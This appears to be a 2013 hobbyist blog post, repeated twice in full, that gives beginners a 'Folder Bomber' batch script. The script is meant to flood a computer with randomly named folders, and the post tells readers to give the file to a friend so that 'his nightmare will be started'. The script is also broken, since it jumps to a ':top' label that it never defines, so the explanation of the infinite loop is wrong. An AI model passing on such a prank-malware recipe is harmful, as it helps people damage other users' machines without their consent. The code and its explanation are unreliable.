Sunday, 13 October 2013

The mindbenders: Deadly .bat Virus (create using Notepad) n00b friendly

Hi To All The Mindbenders
-:Folder Bomber:-
Aim:-   create 3000+ folder in less than a minute.
Steps To follow:-
Open your notepad and type the following codes. (only copy the text in red)

<code-- start do not copy>

@echo off
md %random%
goto top

</code-- end do not copy >

Save it as 3000.bat
Give this file to your friend and when he will click on that his nightmare will be started.

Above Code Explained
@echo off makes your command prompt window blank.  
md %random% is the command in MS-DOS to create random folders. (md is used for creating a folder and %random% means folders with random names.) 
goto top - retures the command to :top which causes an infinite loop.

===(Next Is What...?)===

Sunday, 13 October 2013

The mindbenders: Deadly .bat Virus (create using Notepad) n00b friendly

Hi To All The Mindbenders
-:Folder Bomber:-
Aim:-   create 3000+ folder in less than a minute.
Steps To follow:-
Open your notepad and type the following codes. (only copy the text in red)

<code-- start do not copy>

@echo off
md %random%
goto top

</code-- end do not copy >

Save it as 3000.bat
Give this file to your friend and when he will click on that his nightmare will be started.

Above Code Explained
@echo off makes your command prompt window blank.  
md %random% is the command in MS-DOS to create random folders. (md is used for creating a folder and %random% means folders with random names.) 
goto top - retures the command to :top which causes an infinite loop.

===(Next Is What...?)===